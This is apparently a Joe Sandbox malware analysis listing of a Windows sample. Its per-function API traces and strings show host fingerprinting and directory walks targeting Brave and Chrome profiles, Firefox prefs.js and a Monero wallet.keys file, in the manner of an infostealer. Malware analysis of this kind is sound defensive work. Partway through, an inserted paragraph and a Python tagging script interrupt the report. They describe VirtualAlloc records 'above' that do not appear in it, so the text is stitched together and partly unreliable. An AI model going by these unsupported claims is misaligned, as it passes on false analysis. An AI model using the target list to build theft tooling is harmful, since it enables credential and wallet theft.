                              • Opcode ID: 5a1c786e680ebfad8d00ce229c50f24d3cd881907fa0e69cca021349977ee8e6
                              • Instruction ID: 2803fe16bf4c4452e81b7e19969841c721c2921359e5931e35969c485f00e555
                              • Opcode Fuzzy Hash: 5a1c786e680ebfad8d00ce229c50f24d3cd881907fa0e69cca021349977ee8e6
                              • Instruction Fuzzy Hash: 31F0E275641208BBEB149AA4AC4EFBAB7E8E705B15F300459F904E3280D5719F48DAA5
                              APIs
                                • Part of subcall function 00C678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67910
                                • Part of subcall function 00C678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C67917
                                • Part of subcall function 00C678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
                                • Part of subcall function 00C67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C511B7), ref: 00C67880
                                • Part of subcall function 00C67850: RtlAllocateHeap.NTDLL(00000000), ref: 00C67887
                                • Part of subcall function 00C67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
                              • ExitProcess.KERNEL32 ref: 00C511C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 9878b88af33569ab9ec1dcb5de2d1fe2764d99f1f06fb3df981c351a4c29fa5b
                              • Instruction ID: e3bdb71ce2550aeaf4d0822620c56399accf648662be20dfb32a4dbd912d8b39
                              • Opcode Fuzzy Hash: 9878b88af33569ab9ec1dcb5de2d1fe2764d99f1f06fb3df981c351a4c29fa5b
                              • Instruction Fuzzy Hash: 96E0E66591420157DA1073F16C4AB2A329C5B1434EF080926BF05F2143F915E94895A9
                              APIs
                              • wsprintfA.USER32 ref: 00C638CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C638E3
                              • lstrcat.KERNEL32(?,?), ref: 00C63935
                              • StrCmpCA.SHLWAPI(?,00C70F70), ref: 00C63947
                              • StrCmpCA.SHLWAPI(?,00C70F74), ref: 00C6395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C63C67
                              • FindClose.KERNEL32(000000FF), ref: 00C63C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0236f499e2bdcacdf6f9eb135c04d529a944b29ca207d4f20581d59471bcec6d
                              • Instruction ID: c3ce42a2bd536847afd98d73d0fbd4d599c7dbfbe8ccb532c48c7d3a74192800
                              • Opcode Fuzzy Hash: 0236f499e2bdcacdf6f9eb135c04d529a944b29ca207d4f20581d59471bcec6d
                              • Instruction Fuzzy Hash: B5A132B1A00218AFDB34DFA5DC85FEA7378BF44300F084599B51DA6141EB759B88CFA2
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00C70B32,00C70B2B,00000000,?,?,?,00C713F4,00C70B2A), ref: 00C5BEF5
                              • StrCmpCA.SHLWAPI(?,00C713F8), ref: 00C5BF4D
                              • StrCmpCA.SHLWAPI(?,00C713FC), ref: 00C5BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5C7BF
                              • FindClose.KERNEL32(000000FF), ref: 00C5C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 2108f2b10fed69ace702bfcf8672f1d1f3baa603d85f13f4ac4cf809209c18c6
                              • Instruction ID: 1aebe3902549d28d31c85eed2d12595f8cb592129cc82eb5359a7ba45465ead0
                              • Opcode Fuzzy Hash: 2108f2b10fed69ace702bfcf8672f1d1f3baa603d85f13f4ac4cf809209c18c6
                              • Instruction Fuzzy Hash: F24242729101049BCB24FBA0DDD6EEE737DAF98300F404569B90AB7081EE349B49DF92
                              APIs
                              • wsprintfA.USER32 ref: 00C6492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C64943
                              • StrCmpCA.SHLWAPI(?,00C70FDC), ref: 00C64971
                              • StrCmpCA.SHLWAPI(?,00C70FE0), ref: 00C64987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C64B7D
                              • FindClose.KERNEL32(000000FF), ref: 00C64B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 445aadb8be776a16c710ec4778f078379c1a50126f39af392486d01a0c112d51
                              • Instruction ID: d41091344da460deeafb61a514fdc30ddb2cf449d9b083b804e3ba4c627c5a12
                              • Opcode Fuzzy Hash: 445aadb8be776a16c710ec4778f078379c1a50126f39af392486d01a0c112d51
                              • Instruction Fuzzy Hash: 9A6114B1510218AFCB34EBA1DC89EEA737CBF48701F048599F509A6141EB75AB89CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C64580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C64587
                              • wsprintfA.USER32 ref: 00C645A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C645BD
                              • StrCmpCA.SHLWAPI(?,00C70FC4), ref: 00C645EB
                              • StrCmpCA.SHLWAPI(?,00C70FC8), ref: 00C64601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C6468B
                              • FindClose.KERNEL32(000000FF), ref: 00C646A0
                              • lstrcat.KERNEL32(?,007FE748), ref: 00C646C5
                              • lstrcat.KERNEL32(?,007FDC20), ref: 00C646D8
                              • lstrlen.KERNEL32(?), ref: 00C646E5
                              • lstrlen.KERNEL32(?), ref: 00C646F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 75f850fceca296aa7e4b3d28c1afcdd0e12013295876af9fb40c36209ed15660
                              • Instruction ID: 93f5d5eef478e24fe26a5dd52aa7bf058beee016cdb1dd02bf1e09a89a7e6d33
                              • Opcode Fuzzy Hash: 75f850fceca296aa7e4b3d28c1afcdd0e12013295876af9fb40c36209ed15660
                              • Instruction Fuzzy Hash: 1D5133B55002189FCB34EBB0DC89FE9737CAF58701F44459AF619A6190EB749B888F91
                              APIs
                              • wsprintfA.USER32 ref: 00C63EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C63EDA
                              • StrCmpCA.SHLWAPI(?,00C70FAC), ref: 00C63F08
                              • StrCmpCA.SHLWAPI(?,00C70FB0), ref: 00C63F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C6406C
                              • FindClose.KERNEL32(000000FF), ref: 00C64081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 091077594c0e3f7a39df7c947eca21f9d2f4b7d09f06f91da13c032f5de47816
                              • Instruction ID: 1d02ef33e75057923c3c68f33122aae3b0e75594cd533bcbf5be8ba6d1cf50bc
                              • Opcode Fuzzy Hash: 091077594c0e3f7a39df7c947eca21f9d2f4b7d09f06f91da13c032f5de47816
                              • Instruction Fuzzy Hash: C95158B1910218AFCB34EBB0DC89EFA737CBF44300F44459AB659A6040EB759B898F95
                              APIs
                              • wsprintfA.USER32 ref: 00C5ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00C5ED55
                              • StrCmpCA.SHLWAPI(?,00C71538), ref: 00C5EDAB
                              • StrCmpCA.SHLWAPI(?,00C7153C), ref: 00C5EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5F2AE
                              • FindClose.KERNEL32(000000FF), ref: 00C5F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: f66646d418a5fc5aaa9f3fc143e93929d1673de3329373ae247f217fef745af0
                              • Instruction ID: 1ae7044966f707fcfcb295c061682cb48bda03c68cbb15e0b663a38eedebe8ab
                              • Opcode Fuzzy Hash: f66646d418a5fc5aaa9f3fc143e93929d1673de3329373ae247f217fef745af0
                              • Instruction Fuzzy Hash: BCE1C1719111189ADB68FB61DCD2EEE7378AF54300F5041A9B50A73092EF306F8ADF92
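The function records above repeat a small number of API shapes: a VirtualAlloc/VirtualFree pair (the size argument 17C841C0 decodes to 399,000,000 bytes, flags 00003000 to MEM_COMMIT|MEM_RESERVE, protection 00000004 to PAGE_READWRITE), GetComputerNameA and GetUserNameA reached from a function that then calls ExitProcess, and several FindFirstFileA / StrCmpCA / FindNextFileA / FindClose loops whose String IDs name Brave, Google Chrome, Preferences and \Monero\wallet.keys. The script below is an added triage helper, not part of the Joe Sandbox report and not code from the analysed sample: it parses records in the report's own "APIs" / "String ID" layout and tags each function by the pattern its API chain shows. The tag names are this example's own labels. Whether the large allocation is a memory-size check or the name lookups gate execution is an inference the listing alone does not prove; the tags only record that the pattern is present. The sample input is a constructed copy of three records from this page.

```python
"""Behaviour tagging for Joe Sandbox per-function API listings.
Added example, not part of the Joe Sandbox report and not code from the analysed
sample.  Assumed: a record starts at an "APIs" heading and runs to the next one;
the tag names below are this example's own labels, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line of the listing, with or without the "Part of subcall function" prefix.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STRING_ID_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")
# Win32 constants for VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}

@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: str                       # call-site address from the "ref:" field
    subcall: Optional[str] = None  # callee address when listed as "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

def parse_records(report_text: str) -> List[FunctionRecord]:
    """Split the listing into per-function records; keep API lines and String IDs."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every function entry opens with this heading
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif (m := API_RE.search(line)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(Call(m.group("name"), m.group("module"), args,
                                      m.group("ref").upper(), m.group("sub")))
        elif (m := STRING_ID_RE.search(line)):  # Joe Sandbox joins a function's strings with "$"
            current.strings.extend(s for s in m.group("ids").split("$") if s)
    return records

def decode_virtualalloc(call: Call) -> dict:
    """Turn the hex argument list of a VirtualAlloc line into named fields."""
    address, size, alloc_type, protect = (int(a, 16) for a in call.args[:4])
    flags = [n for bit, n in MEM_FLAGS.items() if alloc_type & bit] or [hex(alloc_type)]
    return {"address": address, "size": size, "alloc_type": "|".join(flags),
            "protect": PAGE_PROTECT.get(protect, hex(protect))}

def tag_behaviours(rec: FunctionRecord) -> set:
    """Label a function from the APIs it calls and the literal strings it touches."""
    names = {c.name for c in rec.calls}
    tags = set()
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= names:
        tags.add("directory_walk")             # the FindFirstFile/FindNextFile/FindClose loop
    if names & {"GetComputerNameA", "GetUserNameA"}:
        tags.add("host_fingerprint")
        if "ExitProcess" in names:
            tags.add("fingerprint_then_exit")  # name lookup and ExitProcess in one function
    if {"VirtualAlloc", "VirtualFree"} <= names:
        tags.add("alloc_probe")                # VirtualAlloc paired with VirtualFree
    # Both the String ID field and call arguments carry literals (paths, product names).
    blob = " ".join(rec.strings + [a for c in rec.calls for a in c.args]).lower()
    if any(k in blob for k in ("preferences", "google chrome", "brave")):
        tags.add("browser_profile_target")
    if "wallet" in blob:
        tags.add("crypto_wallet_target")
    return tags

# Constructed sample: three records copied from the listings above, trimmed to the
# lines the parser needs (the repeated "Associated:" memory-dump lines are left out).
SAMPLE_REPORT = r"""APIs
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C510B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C510F7
APIs
  • Part of subcall function 00C678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
  • Part of subcall function 00C67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
• ExitProcess.KERNEL32 ref: 00C511C6
APIs
  • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
• FindFirstFileA.KERNEL32(00000000,?,00C70B32,00C70B2B,00000000,?,?,?,00C713F4,00C70B2A), ref: 00C5BEF5
• FindNextFileA.KERNEL32(000000FF,?), ref: 00C5C7BF
• FindClose.KERNEL32(000000FF), ref: 00C5C7D1
• String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        print(sorted(tag_behaviours(rec)), [decode_virtualalloc(c) for c in rec.calls if c.name == "VirtualAlloc"])
```

Lines the parser does not recognise (the "Associated:" dump lines, fuzzy hashes, "Yara matches" and "Similarity" headings) are skipped, so the full page can be fed in as-is. Calls listed as "Part of subcall function" keep the callee address in `subcall`; a tag derived from such a line means the behaviour is reachable from the function, not implemented in it, which matters when mapping tags back to the addresses in the "ref:" fields.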
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C715B8,00C70D96), ref: 00C5F71E
                              • StrCmpCA.SHLWAPI(?,00C715BC), ref: 00C5F76F
                              • StrCmpCA.SHLWAPI(?,00C715C0), ref: 00C5F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00C5FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 389fd319d9dcd12bd458ac94f7277545d820c7019e60b4160705a718220289de
                              • Instruction ID: 8ae68c68ae12fb49addbb2b98c7d6a83727842f991a1bfab2cf912ebf3113ab5
                              • Opcode Fuzzy Hash: 389fd319d9dcd12bd458ac94f7277545d820c7019e60b4160705a718220289de
                              • Instruction Fuzzy Hash: 7FB145759101049BDB38FF60DC96BEE7379AF54300F5081A9E90AA7191EF306B4ADF92
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C7510C,?,?,?,00C751B4,?,?,00000000,?,00000000), ref: 00C51923
                              • StrCmpCA.SHLWAPI(?,00C7525C), ref: 00C51973
                              • StrCmpCA.SHLWAPI(?,00C75304), ref: 00C51989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C51D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00C51DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00C51E20
                              • FindClose.KERNEL32(000000FF), ref: 00C51E32
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
